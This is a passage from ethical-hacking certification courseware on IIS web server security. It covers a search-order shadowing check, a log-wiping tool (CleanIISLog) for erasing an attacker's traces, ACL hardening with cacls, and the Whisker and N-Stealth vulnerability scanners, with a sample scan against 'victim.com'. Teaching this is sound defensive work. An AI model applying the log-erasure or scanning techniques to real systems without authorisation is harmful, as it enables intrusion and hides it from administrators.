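    return shadowed_by("explorer.exe", GENUINE_SHELL, ORDER,
                       [GENUINE_SHELL, r"C:\explorer.exe", r"C:\WINNT\system32\cmd.exe"])


if __name__ == "__main__":
    print("clean install ->", clean_system())
    print("file at root  ->", planted_root())
```

The same shadowed_by() check can be run over a list of real directory contents to audit a machine: for every unqualified name a startup entry uses, any hit that is not the expected absolute path deserves a look, and the fix the text implies is to store the absolute path in the registry value so the search order is never consulted.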

start sidebar
Hacking Tool: CleanIISLog
  • This tool clears the log entries in the IIS log files filtered by IP address.

  • An attacker can easily cover his trace by removing entries based on his IP address in W3SVC Log Files.

end sidebar
 

This tool clears the log entries in the IIS log files filtered by IP address. An attacker can easily cover his trace by removing entries based on his IP address in the Log Files.

start sidebar
File System Traversal Counter measures
  • Microsoft recommends setting the NTFS ACLs on cmd.exe and several other powerful executables to Administrators and SYSTEM: Full Control only.

  • Remove executable permission to IUSR account.

  • This should stop directory traversal in IIS.

  • Apply Microsoft patches and Hotfixes regularly.

end sidebar
 

File System Traversal Countermeasures, as recommended by Microsoft Corporation: set the NTFS ACLs on cmd.exe and several other powerful executables to Administrators and SYSTEM: Full Control only. It is advised that the executable permission for the IUSR account be removed. This should stop directory traversal in IIS. It is also necessary that Microsoft patches and hotfixes be applied on a regular basis.

start sidebar
Solution: UpdateExpert
  • Update Expert is a Windows administration program that helps you secure your systems by remotely managing service packs and hot fixes.

  • Microsoft constantly releases updates for the OS and mission critical applications, which fix security vulnerabilities and system stability problems.

  • UpdateExpert enhances security, keeps systems up to date, eliminates sneaker-net, improves system reliability and QoS

end sidebar
 

Update EXPERT is a hotfix and service pack security management utility that helps systems administrators keep their hotfixes and service packs up-to-date by analyzing which service packs and hotfixes are installed on the Windows 2000/NT and Terminal Server machines on their network, which ones are not installed and which ones are available. UpdateEXPERT facilitates locating, downloading and installing the latest service packs and hotfixes. UpdateExpert eliminates the confusion and labor of maintaining hotfixes.

start sidebar
cacls.exe utility
  • Built-in Windows 2000 utility (cacls.exe) can set access control list (ACLs) permissions globally.

  • Let's say you want to change permissions on all executable files to System:Full, Administrators:Full,

     C:\>cacls.exe c:\myfolder\*.exe /T /G System:F Administrators:F 
end sidebar
 

Cacls.exe is a Windows NT/2000/XP command-line tool that can be used to assign, display, or modify ACLs (access control lists) on files or folders. Cacls is an interactive tool, and since it is a command-line utility, it can also be used in batch files. Cacls can also be used in conjunction with other command-line tools. Used with other administration tools, Cacls makes it much easier to handle administrative tasks performed in large environments.

Cacls is used from the command line for single tasks or within a batch file for multiple operations. The default location of Cacls.exe is the %SystemRoot%\System32 folder for all installations of Windows NT, 2000, and XP, and it requires the NTFS file system. Cacls also allows for the use of wildcards, variables, and multiple permissions or users per line. Cacls usage is similar across all Windows versions, which eases the learning curve across new releases of Windows. To see the Cacls options, start a command prompt and type cacls. This will show a list of options and parameters. The simplest operation that Cacls can perform is to display the ACLs of a file or folder with a command such as: cacls c:\folder\file.txt

Operation                                                       Parameter
--------------------------------------------------------------  ------------
Change ACLs of specified files in current folder and all        /T
  subfolders
Edit ACL instead of replacing it                                /E
Continue on access-denied errors                                /C
Grant specified user access rights; permissions are Read (R),   /G user:perm
  Write (W), Change (C), Full Control (F)
Revoke ACLs                                                     /R user
Replace specified user's access rights; permissions are None    /P user:perm
  (N) and the same options as the grant operation
Deny specified user access                                      /D user

start sidebar
Network Tool: Whisker
  • Whisker is an automated vulnerability scanning software which scans for the presence of exploitable files on remote Web servers.

  • Refer the output of this simple scan given below and you will see Whisker has identified several potentially dangerous files on this IIS5Server

     c:\>whisker.pl -h victim.com -s scan.db
     = - = - = - = - = - = - =
     = Host: victim.com
     = Server: Microsoft-IIS/5.0
     + 200 OK: GET /whisker.ida
     + 200 OK: GET /whisker.idg
     + 200 OK: HEAD /_vti_inf.html
     + 200 OK: HEAD /_vti_bin/shtml.dll
     + 200 OK: HEAD /_vti_bin/shtml.exe
end sidebar
 
Tools  

The primary purpose of whisker 2.0 is to be a CGI scanner, which is used to search for known vulnerable CGIs on websites. Whisker does this both by scanning for the CGIs directly and by crawling the website in order to determine which CGIs are currently in use.

Whisker is an excellent CGI scanner. Whisker has the capability to not only check for CGI vulnerabilities but do so in an evasive manner, so as to elude intrusion detection systems. It comes with excellent documentation which should be carefully reviewed prior to running the program. When you have found your Web servers serving up CGI scripts, Whisker can be an excellent resource for checking the security of these servers.

Whisker popularized Web vulnerability scanning with its Perl implementation, which made extending the URL database easy. Whisker is best used as a URL scanner. It identifies Web pages with known security problems or those pages that should be removed to make a clean Web document root. It can also perform brute force attacks against sites using HTTP Basic Authentication.

The last version of Whisker also has the capability to scan servers over SSL, but the scanner suffers the drawback of being primarily a URL checker. If it doesn't find a page, it reports it to the user, but vulnerability checks for IIS bugs such as the Unicode or Double Decode directory traversal or Netscape's PageServices bug are not in this version.

start sidebar
Network Tool: Stealth HTTP Scanner

http://www.nstalker.com/nstealth/

  • N-Stealth 5 is an impressive Web vulnerability scanner that scans over 18000 HTTP security issues.

  • Stealth HTTP Scanner writes scan results to an easy HTML report.

  • N-Stealth is often used by security companies for penetration testing and system auditing, specifically for testing Web servers.

end sidebar
 
Tools  

N-Stealth 5.0 is a vulnerability-assessment product that scans web servers to identify security problems and weaknesses that might allow an attacker to gain privileged access. The software comes with an extensive database of over 25,000 vulnerabilities and exploits. N-Stealth is more actively maintained than the network security scanners and consequently has a larger database of vulnerabilities.

N-Stealth is a comprehensive web server security-auditing tool that scans for over 25,000 vulnerabilities. It is ideal for system administrators, security consultants and IT professionals. The software has a wide array of scanning techniques and an extensive security-hole database. The program runs on Windows 95/98/ME/NT/2K or XP.




Staff of EC-Council - Ethical Hacking Student Courseware. Certified Ethical Hacker - Exam 312-50 (EC-Council E-Business Certification Series)
ISBN: N/A
EAN: N/A
Year: 2003
Pages: 109
